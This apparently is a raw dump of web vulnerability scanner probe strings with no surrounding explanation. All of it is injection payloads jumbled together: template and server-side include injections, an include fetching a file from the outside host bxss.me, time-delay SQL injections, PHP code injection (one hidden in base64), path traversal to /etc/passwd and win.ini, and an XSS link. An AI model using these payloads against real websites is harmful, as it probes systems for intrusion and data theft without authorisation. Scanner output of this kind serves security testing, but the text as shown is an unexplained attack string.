<th:t="${dfb}#foreach pHqghUme<esi:include src="http://bxss.me/rpb.png"/> http://bxss.me/t/fit.txt?.jpg ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) '" 1 waitfor delay '0:0:15' -- ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> xfs.bxss.me '"() ';print(md5(31337));$a=' <!-- ";print(md5(31337));$a=" pHqghUme ../../../../../../../../../../../../../../etc/passwd Http://bxss.me/t/fit.txt ${@print(md5(31337))} fnfOzvSR ${@print(md5(31337))}\ ../../../../../../../../../../../../../../windows/win.ini /etc/shells '.print(md5(31337)).' dfb{{98991*97996}}xca if(now()=sysdate() c:/windows/win.ini <a HrEF=http://xss.bxss.me></a> sleep(15) bxss.me pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98)
